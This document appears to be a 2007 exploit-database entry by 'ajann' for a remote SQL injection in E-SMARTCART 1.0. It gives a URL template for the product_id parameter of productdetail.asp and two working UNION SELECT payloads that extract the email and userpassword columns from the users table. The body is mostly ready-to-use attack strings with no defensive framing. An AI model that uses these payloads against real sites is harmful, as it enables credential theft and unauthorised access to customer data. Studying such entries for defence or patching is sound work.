id: 1359
date: 01/03/2007
title: E-SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability
author: ajann
cves: 

===============================================================
E-SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability
===============================================================



*******************************************************************************
# Title   :  E-SMARTCART 1.0 (product_id) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  ...
# $$      :  $49.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=[SQL]

Example:

//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-27]  #